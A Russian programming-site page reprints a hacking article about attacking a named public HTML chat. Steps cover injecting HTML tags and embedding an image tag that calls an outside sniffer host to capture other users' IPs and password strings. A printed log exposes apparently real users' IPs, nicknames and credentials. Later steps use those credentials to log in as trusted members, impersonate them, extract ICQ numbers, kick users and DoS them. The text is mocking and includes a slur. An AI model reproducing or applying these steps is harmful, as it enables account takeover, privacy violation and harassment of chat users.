Навигация
Главная
Поиск
Форум
FAQ's
Ссылки
Карта сайта
Чат программистов

Статьи
-Delphi
-C/C++
-Turbo Pascal
-Assembler
-Java/JS
-PHP
-Perl
-DHTML
-Prolog
-GPSS
-Сайтостроительство
-CMS: PHP Fusion
-Инвестирование

Файлы
-Для программистов
-Компонеты для Delphi
-Исходники на Delphi
-Исходники на C/C++
-Книги по Delphi
-Книги по С/С++
-Книги по JAVA/JS
-Книги по Basic/VB/.NET
-Книги по PHP/MySQL
-Книги по Assembler
-PHP Fusion MOD'ы
-by Kest
Professional Download System
Реклама
Услуги

Автоматическое добавление статей на сайты на Wordpress, Joomla, DLE
Заказать продвижение сайта
Программа для рисования блок-схем
Инженерный калькулятор онлайн
Таблица сложения онлайн
Популярные статьи
OpenGL и Delphi... 65535
Форум на вашем ... 65535
21 ошибка прогр... 65535
HACK F.A.Q 65535
Бип из системно... 65535
Гостевая книга ... 65535
Invision Power ... 65535
Пример работы с... 65535
Содержание сайт... 65535
ТЕХНОЛОГИИ ДОСТ... 65535
Организация зап... 65535
Вызов хранимых ... 65535
Создание отчето... 65535
Имитационное мо... 65535
Программируемая... 65535
Эмулятор микроп... 65535
Подключение Mic... 65535
Создание потоко... 65535
Приложение «Про... 65535
Оператор выбора... 65535
Реклама
Сейчас на сайте
Гостей: 11
На сайте нет зарегистрированных пользователей

Пользователей: 13,372
новичок: vausoz
Новости
Реклама
Выполняем курсовые и лабораторные по разным языкам программирования
Подробнее - курсовые и лабораторные на заказ
Delphi, Turbo Pascal, Assembler, C, C++, C#, Visual Basic, Java, GPSS, Prolog, 3D MAX, Компас 3D
Заказать программу для Windows Mobile, Symbian

База данных склада на Delphi + Схема БД
Моделирование ЭВМ на GPSS (три класса заданий) + Пояснительная записка
Сравнение двух бинарных деревьев на Turbo Pascal + отчет

Дырки в безопасности чатов
Ты, конечно же, в курсе, что многие чаты на www далеки от совершенства. Нет, ну конечно, у них там есть всякие фенечки, всякие картиночки, рисуночки и прочая фигня, но вот защита там частенько просто отсутствует. Таких чатов полно, поэтому мы решили взять первый попавшийся из них и описать способы взлома. Системным администраторам этого чата Х советует еще раз проверить, что они там наконфигурили, и заткнуть все описываемые ниже дырки. Чат находится по адресу www.chat.orc.ru.
Будь готов - всегда готов
Когда нефига делать, то можно залезть и поприкалываться в html-чатах. Там, как правило, сидят ламеры и уроды, а также люди, которые только зашли в Инет. Прикалываться можно по разному: вставляя нецензурную брань, неприличные картинки, java-скрипты и прочие пакости. Чат "Початок" представляет стандартный, но немного переделанный свободно распространяемый чат "Chat Machine". В нем, якобы, запрещено вставлять html-теги, но мы это исправим. Размер и цвет шрифтов, которые определил админ, мы тоже исправим, как и скрытие IP других юзеров.
Как менять установки шрифта
Сохраняем то окно, где находятся установки (цвет, размер), открываем текстовым редактором и ищем следующую строчку Красный. Вместо слова Red можно подставить любое название цвета, ведь по умолчанию можно выбирать только цвета, установленные админом. :)
Находим поле Большой. Разве "+2" это большой шрифт? :) Нет, так дело не пойдет, пишем "+5".
Как вставлять теги
Находим стоку Красный. Берем и изменяем его следующим образом: Красный. Не закрываем тэг (потому что он и так закроется) и после название цвета закрываем тэг. Пишем любое сообщение, и тем самым получается, что чатлане видят не совсем пристойную картинку. :)
Таким образом можно ставить любой тэг типа Красный, и чат начинает "летать" :).
Как войти в чат под другим зарегистрированным пользователем и узнать их IP адреса
Находим строчку Красный и, используя всем известный синффер html чатов, получаем IP участников чата и их пароли. Делается это следующим образом: http://www.hackzone.ru/cgi-bin/sniff.cgi?satan">Красный. Далее пишем какое-либо сообщение, видим картинку HackZone и смотрим лог по адресу http://www.hackzone.ru/files/snifflog.txt. В нем мы видим следующее:
[Tue 3:03pm] (id) 195.210.130.46 d046.p1.col.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=YURIK&passwd=31ZUlukFqoI5c&custom1=on]
[Tue 3:03pm] (id) 212.15.128.4 dobbin.eurocom.od.ua 212.15.128.42 [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=afrodita&passwd=480/SYC8r5W3U&custom1=on]
[Tue 3:03pm] (id) 129.132.26.41 ilea1.ethz.ch [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Monach&passwd=49aiRPRMobjZ6&custom1=on]
[Tue 3:03pm] (id) 195.2.78.163 p163.n78.dip.aha.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Patron25&passwd=13ttx6i7zWwkk&custom1=on]
[Tue 3:03pm] (id) 199.203.4.5 customer.netvision.net.il 207.232.23.220,194.90.119.123 [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=_RENAT__&passwd=315ybDkg5YM22&custom1=on]
[Tue 3:03pm] (id) 193.232.119.130 ns.misa.ac.ru 192.168.12.133 [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Dasha&passwd=27tQONxBHE612&custom1=on]
[Tue 3:03pm] (id) 195.210.130.46 d046.p1.col.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=YURIK&passwd=31ZUlukFqoI5c&custom1=on]
[Tue 3:03pm] (id) 195.91.140.77 ppp666.nigger.is.satan.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Satan&passwd=40xtEwTiIfRQI&custom1=on]
[Tue 3:03pm] (id) 195.2.78.163 p163.n78.dip.aha.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Patron25&passwd=13ttx6i7zWwkk&custom1=on]
[Tue 3:02pm] (id) 195.34.28.213 dialup-28213.dialup.ptt.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=_GUN_&passwd=13/hfDaaKZEeg&custom1=on]
Вот они все на ладони :).
Если надо, запингуем кого-нибудь со всех шеллов, а особых уродов заДоСим чем-нибудь типа kod.c или pimp.c.
Как хакеры втираются в доверие
Теперь можно зайти под любым пользователем, который находится в чате, не зная его пароль. Выбираем, например, доброго GUN'a, который уже 2 года в этом чате сидит и которому все доверяют. :) Копируем его строку и вставляем в браузер: http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=_GUN_&passwd=13/hfDaaKZEeg&custom1=on.
Вуаля! Мы зашли под ним в чат, и теперь, сославшись на потерю памяти, можно выведать у всех пользователей ICQ номера, дать чего надо и наслаждаться жизнью. :)
Не забудь, что после каждого изменения твоего файла с установками его нужно сохранять и нажимать кнопку применить.
Исходник снифера можно взять по адресу http://www.hackzone.ru/files/sniff.txt и изменить, чтобы не показывалась картинка, а то особо мудрые совы могут что-то заподозрить.
Очень много людей знают про хакзоновский сниффер, так что можно воспользоваться нашим: http://phorce.virtualave.net/cgi-bin/sniffer.cgi, лог-файл: http://phorce.virtualave.net/cgi-bin/fuck.log.
Как говорить от других имен
Узнав шифрованный пароль того кого нужно с помощью сниффера, сохраняем то окно, где нужно писать текст, и вставляем вместо своего ника чужой (и пароль, конечно), и пишем чего душе угодно!
Как выкидывать из чата
Опять же, получив шифрованный пароль в документе с настройками, сохраненном на нашем диске, в самом низу вставляем вместо своего ника и пароля - чужие. Сохраняем, открываем, жмем выход, затем видим сообщение, что Вася Пупкин покинул чат. :)
Как защититься от сниффера
Это очень просто. Залезаем в установки броузера и вырубаем показ картинок.
Опубликовал Kest October 26 2008 13:27:23 · 1 Комментариев · 8422 Прочтений · Для печати

• Не нашли ответ на свой вопрос? Тогда задайте вопрос в комментариях или на форуме! •


Комментарии
ibragim December 24 2011 03:42:28
airwayfun.com
Добавить комментарий
Имя:



smiley smiley smiley smiley smiley smiley smiley smiley smiley
Запретить смайлики в комментариях

Введите проверочный код:* =
Рейтинги
Рейтинг доступен только для пользователей.

Пожалуйста, залогиньтесь или зарегистрируйтесь для голосования.

Нет данных для оценки.
Гость
Имя

Пароль



Вы не зарегистрированны?
Нажмите здесь для регистрации.

Забыли пароль?
Запросите новый здесь.
Поделиться ссылкой
Фолловь меня в Твиттере! • Смотрите канал о путешествияхКак приготовить мидии в тайланде?
Загрузки
Новые загрузки
iChat v.7.0 Final...
iComm v.6.1 - выв...
Visual Studio 200...
CodeGear RAD Stud...
Шаблон для новост...

Случайные загрузки
FileFind
Berg
Самоучитель Прогр...
mmmJlabel
Prolog Interprete...
Язык программиров...
Электронный магаз...
Ранги для форума
Delphi. Учимся на...
Основы программир...
ATComponents
Искусство програм...
CarGame [Исходник...
Indy in Depth Глу...
«Философия» прогр...
Java Server Pages...
Клавиатурный трен...
Игра змейка
Факториал [Исходн...
Распознавание иде...

Топ загрузок
Приложение Клие... 100779
Delphi 7 Enterp... 97928
Converter AMR<-... 20283
GPSS World Stud... 17034
Borland C++Buil... 14206
Borland Delphi ... 10329
Turbo Pascal fo... 7380
Калькулятор [Ис... 6047
Visual Studio 2... 5213
Microsoft SQL S... 3666
Случайные статьи
на отдельных учетн...
Песочные часы
Как включить отобр...
Следует ли защищат...
Класс-адаптер для...
IBS Вы можете пред...
Создание стандартн...
Концентрированное ...
Мобильная версия A...
Где мы находимся?
Коллективное владение
Вызов хранимых про...
Трендовые темы
- contoso
Содержание сайта -...
Сигналы SIGKILL и ...
Время работы прогр...
Иногда поддерживаю...
Заливка надписи
Задано натуральное...
Генерация k-элемен...
Представления дере...
Создание объекта E...
Рекурсивное вычисл...
Словарь раскрутки ...
Статистика



Друзья сайта
Программы, игры


Полезно
В какую объединенную сеть входит классовая сеть? Суммирование маршрутов Занимают ли таблицы память маршрутизатора?